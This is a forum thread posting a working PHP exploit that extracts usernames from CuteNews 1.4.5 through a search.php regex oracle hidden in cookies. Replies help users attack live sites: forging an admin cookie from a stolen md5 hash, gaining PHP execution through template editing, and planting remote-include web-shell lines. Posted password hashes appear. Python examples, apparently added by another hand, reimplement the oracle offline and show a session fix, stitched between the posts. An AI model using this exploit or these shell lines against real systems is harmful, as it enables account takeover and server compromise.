Cutenews <= 1.4.5 usernames fetching exploit
PostPosted: Sun Dec 23, 2007 10:48 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Code:
<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// Cutenews <= 1.4.5 usernames fetching exploit
// Version 1.1
// Written by Janek Vind "waraxe"
// http://www.waraxe.us
// 25. dec 2007
// Estonia, Tartu
//
// FEATURES:
// 1. Fetching algorithm optimized for speed (charset halving, few requests per character)
// 2. Attack parameters travel in the Cookie header, which default webserver
//    access logs do not record (the burst of requests to search.php still is)
// 3. Pretesting saves time if Cutenews is not vulnerable
//
// Version 1.1 -> pattern recognize improved
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$target = 'http://localhost/cutenews.1.4.5/search.php';
$level = 1; // User level needed, admin is 1
$outfile = './cute_log.txt';// Log file
//=====================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
if(($level < 1) || ($level > 4))
{
   die('Specified level is invalid!');
}
$levels = array(1=>'admin',2=>'editor',3=>'journalist',4=>'commenter');
$levelname = $levels[$level];
$start_time = time();
$users_cnt = array();
$users = array();
$requests = 0;
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
   if(!isset($_REQUEST['wtf-is-cli']))
   {
      echo "<html><head><title>Attention!</title></head>\n";
      echo "<body><br /><br /><center>\n";
      echo "<h1>Warning!</h1>\n";
      echo "This exploit is meant to be used as php CLI script!<br />\n";
      echo "More information:<br />\n";
      echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
      echo "Still, you can try to run it from webserver.<br />\n";
      echo "Just press the button below and prepare for long waiting<br />\n";
      echo "And learn to use php CLI next time, please ...<br />\n";
      echo "<form method=\"get\">\n";
      echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
      echo "</form>\n";
      echo "</center></body></html>\n";
      exit;
   }
   else
   {
      // Let's try to maximize our chances without CLI
      set_time_limit(0);
   }
}
//=====================================================================
add_logline("-------------------------------------------------------");
add_logline("Cutenews usernames fetching started");
add_logline("Target: $target");
add_logline("Reglevel: $levelname");

pre_test();
fetch_users();
$fcnt = count($users);

add_logline("Fetched $fcnt usernames with reglevel '$levelname'\n");
xecho("\nFetched $fcnt usernames with reglevel '$levelname'\n", 1);

foreach($users as $username)
{
   add_logline($username);
   xecho($username, 1);
}

$run_time = time() - $start_time;
xecho("\nTotal time spent: $run_time seconds", 1);
xecho("HTTP requests made: $requests\n", 1);
xecho("Questions and feedback - http://www.waraxe.us/forums.html", 1);
xecho("See ya! :)", 1);

exit;
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function fetch_users()
{
   global $users_cnt, $level, $levelname;
   $maxlen = 15;

   if($users_cnt[$level] < 1)
   {
      xecho("No accounts with reglevel '$levelname' - nothing to fetch", 1);
      return;
   }

   // Each entry: known username prefix => how many usernames still share it
   $pieces = array(' ' => $users_cnt[$level]);

   for($i = 0; $i < $maxlen; $i ++)
   {
      $arr = array();
      foreach($pieces as $known => $count)
      {
         $arr2 = reveal_next_char($known, $count);
         // Array union, not array_merge: prefixes like "12" become integer keys
         // and array_merge() would renumber them, losing the prefix
         $arr += $arr2;
      }

      $pieces = $arr;
      // Every username resolved before $maxlen - no point in empty passes
      if(count($pieces) < 1)
      {
         break;
      }
   }
}
///////////////////////////////////////////////////////////////////
function reveal_next_char($known, $count)
{
   global $users_cnt, $users, $level;

   $known = trim((string)$known);
   // '.' is the only regex metacharacter in the charset; escape it so a known
   // prefix like "j." does not also match "j_..." when sent to the oracle
   $known_re = str_replace('.', '\.', $known);
   $charset = 'abcdefghijklmnopqrstuvwxyz0123456789._-';
   $out = array();
   $rl = "[$level]";
   $arr = array("$charset" => $count);
   $found_final = 0;

   while(1)
   {
      $arr2 = array();

      foreach($arr as $subset => $scnt)
      {
         $subset = (string)$subset;
         $curr_len = intval(floor(strlen($subset) / 2));
         $fhalf = substr($subset, 0, $curr_len);
         $shalf = substr($subset, $curr_len);
         $remaining = $scnt;

         foreach(array($fhalf, $shalf) as $half)
         {
            // Second half is only queried if the first did not account for all $scnt
            if($half === '' || $remaining < 1)
            {
               break;
            }
            $un = "^$known_re([$half])";
            xecho("Testing $un");
            $matches = make_query($un, $rl);
            if($matches < 1)
            {
               continue;
            }
            $remaining -= $matches;
            xecho("Found $matches match(es)");
            if(strlen($half) == 1)
            {
               // Next character isolated - is "$known$half" already a complete username?
               if(test_exact_match("$known$half"))
               {
                  if($matches > 1)
                  {
                     // Other usernames continue past this one (e.g. "adm" and "admin")
                     $out["$known$half"] = $matches - 1;
                  }
               }
               else
               {
                  $out["$known$half"] = $matches;
               }
               $found_final += $matches;
            }
            else
            {
               $arr2[$half] = $matches;
            }
         }
      }

      $arr = $arr2;

      if( $found_final >= $count )
      {
         break;
      }
      // Nothing left to split but the count was not reached (character outside
      // the charset, duplicate names, ...) - give up on this prefix instead of
      // spinning forever without making any further requests
      if(count($arr) < 1)
      {
         xecho("Could not resolve all $count name(s) with prefix '$known' - skipping");
         break;
      }
   }

   return $out;
}
////////////////////////////////////////////////////////////////////////
function test_exact_match($un)
{
   global $level;

   $rl = "[$level]";
   // Anchor both ends; escape '.' so that e.g. "j.doe" cannot match "j_doe"
   $test = '^' . str_replace('.', '\.', $un) . '$';

   xecho("Testing for full match $un");
   $matches =  make_query($test, $rl);
   if($matches > 0)
   {
      xecho("Full username found: $un");
      $GLOBALS['users'][]= $un;
      return true;
   }

   xecho("Not full match: $un");
   return false;
}
///////////////////////////////////////////////////////////////////////
function pre_test()
{
   global $users_cnt;
   // Counts every account name of 1-15 chars; note the fetching charset below is
   // lowercase only, so names with uppercase letters are counted here but never resolved
   $un = "^[\.A-Za-z0-9_\-]{1,15}\$";
   
   // Target URL valid?
   xecho("Validating target URL");
   if(strpos(make_get($GLOBALS['target']), 'search_in_archives') === false)
   {
      die('Target URL not valid!');
   }
   xecho("URL is valid");

   $rl = "[1-4]";
   $cnt_all =  make_query($un, $rl);
   if($cnt_all < 1)
   {
      die('Pretest failed - no users at all?');
   }
   else
   {
      xecho("Total $cnt_all user(s) detected:", 1);
      add_logline("Total $cnt_all user account(s)\n");
   }

   $rl = "[1]";
   $cnt_admins =  make_query($un, $rl);
   if($cnt_admins < 1)
   {
      die('Pretest failed - no admins at all?');
   }
   else
   {
      xecho("$cnt_admins admin(s)", 1);
      add_logline("$cnt_admins admin account(s)");
   }
   
   $rl = "[2]";
   $cnt_editors =  make_query($un, $rl);
   xecho("$cnt_editors editor(s)", 1);
   add_logline("$cnt_editors editor account(s)");

   $rl = "[3]";
   $cnt_journalists =  make_query($un, $rl);
   xecho("$cnt_journalists journalist(s)", 1);
   add_logline("$cnt_journalists journalist account(s)");

   $rl = "[4]";
   $cnt_commenters =  make_query($un, $rl);
   xecho("$cnt_commenters commenter(s)", 1);
   add_logline("$cnt_commenters commenter account(s)\n");
   
   if( $cnt_all === ($cnt_admins + $cnt_editors + $cnt_journalists + $cnt_commenters) )
   {
      xecho("Pretesting passed successfully - target is vulnerable!", 1);
   }
   else
   {
      die('Fetched userscounts does not match - fatal exit!');
   }
   
   $users_cnt[1] = $cnt_admins;
   $users_cnt[2] = $cnt_editors;
   $users_cnt[3] = $cnt_journalists;
   $users_cnt[4] = $cnt_commenters;
}
///////////////////////////////////////////////////////////////////////
function make_query($username, $reglevel = '')
{
   global $target;
   $max_retries = 10;

   // search.php is pointed at the users file instead of the news archive and
   // given our regex as the "title" to search for; it answers with the number
   // of matching lines as "[N]:", which is the only thing read back.
   $cookie = "dosearch=yes;files_arch[]=./data/users.db.php;title=$username";
   if(!empty($reglevel))
   {
      // Regex for the user level field, e.g. [1] = admins only
      $cookie .= ";user=$reglevel";
   }
   
   for($retry = 0; $retry < $max_retries + 1; $retry ++)
   {
      if($retry > 0)
      {
         xecho("Request failed!\n");
         xecho("Sleeping $retry seconds\n");
         sleep($retry);
         xecho("Awake ...\n");
         xecho("Retry #$retry\n");
      }
      $buff = make_get($target, $cookie, '', true);
      $ret = preg_match('/\[[0-9]{1,6}\]:/',$buff,$hits);
      if($ret > 0)
      {
         $ret = intval(substr($hits[0], 1));
         if($ret > -1)
         {
            return $ret;
         }
      }
   }
   
   die('Fatal error - server down?');
}
///////////////////////////////////////////////////////////////////////
function make_get($url, $cookie = '', $referer = '', $headers = FALSE)
{
   $ch = curl_init();
   $timeout = 120;
   curl_setopt($ch, CURLOPT_URL, $url);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
   curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); // bound the whole transfer, not only the connect
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
   curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
   
   if(!empty($cookie))
   {
      curl_setopt($ch, CURLOPT_COOKIE, $cookie);
   }
 
   if(!empty($referer))
   {
      curl_setopt($ch, CURLOPT_REFERER, $referer);
   }

   if($headers === TRUE)
   {
      curl_setopt($ch, CURLOPT_HEADER, TRUE);
   }
   else
   {
      curl_setopt($ch, CURLOPT_HEADER, FALSE);
   }

   $fc = curl_exec($ch);
   curl_close($ch);
   $GLOBALS['requests'] ++;
   
   return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_logline($line)
{
   global $outfile;
   
   $line .= "\n";
   $fh = fopen($outfile, 'ab');
   fwrite($fh, $line);
   fclose($fh);
   
}
///////////////////////////////////////////////////////////////////////
function xecho($line, $both = 0)
{
   if($GLOBALS['cli'])
   {
      echo "$line\n";
   }
   elseif($both)
   {
      $line = nl2br(htmlspecialchars($line));
      echo "$line<br />\n";
   }
}
//////////////////////////////////////////////////////////////////////
?>


Feedback is welcome 8)
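The halving search that reveal_next_char() performs, redone in Python as an added example (not waraxe's code and not CuteNews code). An offline stand-in for search.php answers, like the real oracle, only with the number of accounts at a given level whose name matches a regex; on top of it sits the same charset-halving algorithm, with the prefix escaped before it goes into the pattern and a loop that ends when no subset is left to split. The account list, the CountOracle class and the function names are constructed for the example; the real users file format is not modelled.

```python
import re

# Constructed sample accounts (username, level); levels as in the exploit:
# 1 admin, 2 editor, 3 journalist, 4 commenter. Not a real CuteNews users.db.
SAMPLE_USERS = [
    ("admin", 1), ("adm", 1), ("ed_1", 2),
    ("j.doe", 3), ("j_doe", 3), ("bob", 3), ("zed-9", 4),
]

# Same alphabet the exploit halves; '.' and '-' get escaped before use in a class
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789._-"


class CountOracle:
    """Stand-in for search.php: for a regex and a level it returns only the
    number of usernames at that level that match, which is all the exploit
    gets from the '[N]:' line.  Counts every query so the cost is visible."""

    def __init__(self, users):
        self.users = users
        self.requests = 0

    def query(self, pattern, level):
        self.requests += 1
        return sum(1 for name, lvl in self.users
                   if lvl == level and re.search(pattern, name))


def class_of(chars):
    """Regex character class for a slice of CHARSET."""
    return "[%s]" % re.escape(chars)


def reveal_next_char(oracle, known, count, level, found):
    """`count` usernames at `level` start with `known`.  Halve the charset until
    each possible next character is isolated.  Completed names go to `found`;
    returns {longer_prefix: how_many_names_still_share_it}."""
    out = {}
    subsets = {CHARSET: count}
    while subsets:                      # empty => nothing left to split, so no endless loop
        nxt = {}
        for subset, scnt in subsets.items():
            half = len(subset) // 2
            remaining = scnt
            for part in (subset[:half], subset[half:]):
                if remaining < 1:       # first half explained every name: skip the second
                    break
                m = oracle.query("^%s%s" % (re.escape(known), class_of(part)), level)
                if m == 0:
                    continue
                remaining -= m
                if len(part) > 1:
                    nxt[part] = m
                    continue
                cand = known + part
                exact = oracle.query("^%s$" % re.escape(cand), level)
                if exact:
                    found.append(cand)
                if m - exact > 0:       # other names continue past this prefix ("adm" vs "admin")
                    out[cand] = m - exact
        subsets = nxt
    return out


def fetch_users(oracle, level, max_len=15):
    """Enumerate every username at `level` of length 1..max_len, sorted."""
    total = oracle.query("^%s{1,%d}$" % (class_of(CHARSET), max_len), level)
    found = []
    pieces = {"": total}
    for _ in range(max_len):
        if not pieces:
            break
        nxt = {}
        for known, cnt in pieces.items():
            nxt.update(reveal_next_char(oracle, known, cnt, level, found))
        pieces = nxt
    return sorted(found)


if __name__ == "__main__":
    oracle = CountOracle(SAMPLE_USERS)
    for lvl, name in ((1, "admin"), (3, "journalist")):
        print("level %d (%s): %s" % (lvl, name, ", ".join(fetch_users(oracle, lvl))))
    print("oracle queries used:", oracle.requests)
```

Against a live target every oracle.query() is one HTTP request carrying the regex in the Cookie header, so the request counter is the number of lines that would show up in the server's access log for search.php.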
PostPosted: Sat Jan 19, 2008 8:30 pm
PoisonedV
Regular user
Joined: Jan 19, 2008
Posts: 18

Hey, the script is awesome and definitely helpful when trying to find out the admin. However, when I did a search for level 3 accounts, it went for a little bit and then stopped. Any ideas?
PostPosted: Sat Jan 19, 2008 8:37 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

PoisonedV wrote:
Hey, the script is awesome and definitely helpful when trying to find out the admin. However, when I did a search for level 3 accounts, it went for a little bit and then stopped. Any ideas?

That's odd, the script is supposed to work correctly under various conditions ...
Can you provide all the output from the start up to the moment it stops - just strip sensitive info before posting it. This should help to figure out the cause of the problem ...
PostPosted: Sat Jan 19, 2008 9:00 pm
PoisonedV
Regular user
Joined: Jan 19, 2008
Posts: 18

Here's the log file. It doesn't reveal much.

-------------------------------------------------------
Cutenews usernames fetching started
Target: http://xxxxx/cutenews/search.php
Reglevel: journalist
Total 12 user account(s)

1 admin account(s)
1 editor account(s)
10 journalist account(s)
0 commenter account(s)

And that's the end of the log file. In the DOS command window it started off fine:

but then it started acting weird and stopped.

I've tried this multiple times and the same thing happens.
PostPosted: Sat Jan 19, 2008 9:18 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Hmm, seems like some kind of bug in the exploit ... maybe.
Still - you can fetch the admin's username and password md5 hash and then log in as admin. With admin privileges all usernames can be seen and manipulated anyway.
I can't fix this bug without testing against a real target, and right now I don't have much time either.
PostPosted: Sat Jan 19, 2008 9:25 pm
PoisonedV
Regular user
Joined: Jan 19, 2008
Posts: 18

waraxe wrote:
Hmm, seems like some kind of bug in the exploit ... maybe.
Still - you can fetch the admin's username and password md5 hash and then log in as admin. With admin privileges all usernames can be seen and manipulated anyway.
I can't fix this bug without testing against a real target, and right now I don't have much time either.

Yeah, it's fine. I'm asking around for some people to crack the md5 hash of the admin for me; just thought maybe this could speed things up.
PostPosted: Sat Jan 19, 2008 9:45 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

PoisonedV wrote:
waraxe wrote:
Hmm, seems like some kind of bug in the exploit ... maybe.
Still - you can fetch the admin's username and password md5 hash and then log in as admin. With admin privileges all usernames can be seen and manipulated anyway.
I can't fix this bug without testing against a real target, and right now I don't have much time either.

Yeah, it's fine. I'm asking around for some people to crack the md5 hash of the admin for me; just thought maybe this could speed things up.

You don't need to crack the hash to get admin access to a cutenews installation. You just need the right cookie with the hash - that's all. Cookie forgery, it may be called :)
PostPosted: Sat Jan 19, 2008 10:18 pm
PoisonedV
Regular user
Joined: Jan 19, 2008
Posts: 18

Thanks for that tip. Now I can see all users even without using the script. I still want to get that md5 hash cracked though. If you have time, it's fad9894adff22d0cb828ce2eb4029ba1 and 04b4fe759be109523596029186c6eb58,
but if not it's fine.
PostPosted: Thu Jan 24, 2008 12:05 am
Elewyn
Beginner
Joined: Feb 03, 2006
Posts: 3

Can you explain how to craft a cutenews cookie?
PostPosted: Thu Jan 24, 2008 12:11 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Elewyn wrote:
Can you explain how to craft a cutenews cookie?

The cookie must look like this:

Code:

username=admin;md5_password=1b3396f4609f652f7179bd05423c5374;


Use Firefox and a cookie editor add-on to create a new cookie with the username and password hash, as seen above, with the domain pointing to the target website. That's all :)

And by the way - once you have cutenews admin privileges, it's easy to get PHP-level access through template editing. And if safe_mode=off, the next step can be exec(), popen(), system() and/or other shell access functions in PHP :)

Basically - most of the cutenews-powered websites are just waiting for trouble ...
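The cookie above is why the hash never needs cracking: the server compares what is in the cookie with what is in users.db, so the stored hash is itself the credential. Added example, not CuteNews code: a Python model of that check next to the usual fix, a random server-issued session id signed with a server-side key, with the password verified only at login. The account store, cookie names and function names are constructed for the example; the md5 password store is kept only to mirror the page (new code would store bcrypt or Argon2 hashes).

```python
import hashlib
import hmac
import secrets

# Constructed account store: username -> md5(password), the shape the forged
# cookie implies (unsalted md5 in the users file). Not CuteNews code.
USERS = {"admin": hashlib.md5(b"correct horse battery").hexdigest()}


def parse_cookie(header):
    """Split 'k=v;k2=v2' (the format shown in the post) into a dict."""
    out = {}
    for part in header.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            out[key] = value
    return out


def check_weak(cookie_header):
    """Hash-in-cookie login: the stored hash is the credential, so one leaked
    users.db line logs you in and no password cracking is needed."""
    c = parse_cookie(cookie_header)
    stored = USERS.get(c.get("username", ""))
    if stored is None:
        return False
    return hmac.compare_digest(stored.encode(), c.get("md5_password", "").encode())


# --- hardened variant: the password is checked once, server-side, and the
# client only ever holds an opaque, server-signed session id ---
SERVER_KEY = secrets.token_bytes(32)   # per-install secret, never leaves the server
SESSIONS = {}                          # session id -> username


def _sign(sid):
    return hmac.new(SERVER_KEY, sid.encode(), "sha256").hexdigest()


def login(username, password):
    """Verify the password; return the cookie value to set, or None."""
    stored = USERS.get(username)
    given = hashlib.md5(password.encode()).hexdigest()   # matches the md5 store above
    if stored is None or not hmac.compare_digest(stored.encode(), given.encode()):
        return None
    sid = secrets.token_hex(16)
    SESSIONS[sid] = username
    return "session=%s.%s" % (sid, _sign(sid))


def check_hardened(cookie_header):
    """Accept only a session id this server issued and signed; a stolen
    password hash is of no use here, it is never compared against a cookie."""
    value = parse_cookie(cookie_header).get("session", "")
    sid, sep, tag = value.partition(".")
    if not sep:
        return False
    return hmac.compare_digest(_sign(sid).encode(), tag.encode()) and sid in SESSIONS


if __name__ == "__main__":
    forged = "username=admin;md5_password=" + USERS["admin"]
    print("forged cookie, weak check:    ", check_weak(forged))
    print("forged cookie, hardened check:", check_hardened(forged))
    print("hash as password, hardened:   ", login("admin", USERS["admin"]))
```

The second half also answers the thread's "just need the right cookie" point from the defender's side: once the cookie carries a session id rather than the password hash, dumping users.db yields hashes that still have to be cracked before they are worth anything.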
PostPosted: Thu Jan 24, 2008 12:47 am
Elewyn
Beginner
Joined: Feb 03, 2006
Posts: 3

Sorry, I didn't see what you posted; the problem is already solved :)
PostPosted: Wed Jun 04, 2008 4:40 pm
mixman
Regular user
Joined: Jun 03, 2008
Posts: 11
Location: Estonia, Tallinn

I am trying to fetch the admin login name from one site that uses CuteNews 1.4.5 (at least it says so at the bottom of that page).
But when I try to get it, I get this:
Quote:
Fatal error - server down?

But the server is 100% up

Quote:
//=====================================================================
$target = 'http://www.*****.org/cutenews/search.php';
$level = 1; // User level needed, admin is 1
$outfile = './cute_log.txt';// Log file
//=====================================================================

Can anyone help me out with this?

[[edited by waraxe - no real URL-s!]]
PostPosted: Wed Jun 04, 2008 9:12 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

This website is probably patched, so the exploit does not work.
PostPosted: Thu Jun 05, 2008 7:32 pm
Final
Beginner
Joined: Jun 05, 2008
Posts: 3

Hello, first of all, thank you very much for this exploit and the friendly support. These two scripts worked perfectly for me.

I have a question concerning this, however:

waraxe wrote:
And by the way - once you have cutenews admin privileges, it's easy to get PHP-level access through template editing. And if safe_mode=off, the next step can be exec(), popen(), system() and/or other shell access functions in PHP :)

Would you mind explaining how exactly this is possible? I have administrator access to the CuteNews and can create or edit templates. Now I would like to upload my own shell. Is it possible to do this...?

Thanks in advance,

~Final
PostPosted: Fri Jun 06, 2008 8:27 pm
mixman
Regular user
Joined: Jun 03, 2008
Posts: 11
Location: Estonia, Tallinn

Final wrote:
Hello, first of all, thank you very much for this exploit and the friendly support. These two scripts worked perfectly for me.

I have a question concerning this, however:

waraxe wrote:
And by the way - once you have cutenews admin privileges, it's easy to get PHP-level access through template editing. And if safe_mode=off, the next step can be exec(), popen(), system() and/or other shell access functions in PHP :)

Would you mind explaining how exactly this is possible? I have administrator access to the CuteNews and can create or edit templates. Now I would like to upload my own shell. Is it possible to do this...?

Thanks in advance,

~Final

It seems that you can upload a shell by inserting this in the active template:
Code:
<?php include('url to your shell here'); ?>

But don't ask me where this shell goes, I am trying to figure this out myself too...
Perhaps the template file dir???
..../cutenews/data/shell.php
but I guess you can't open a file there due to permissions :roll:

Edit:
Another way should be this:
Insert this into the active template:
Code:
if(isset($_GET['myshell'])) { include($_GET['myshell']); }

Later go to:

Code:
http://site.com/cutenews/index.php?myshell=<URL TO SHELL HERE>

Just some ideas to test; I am very new to this, so better wait for an experienced guy's opinion...
Page 1 of 2  
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"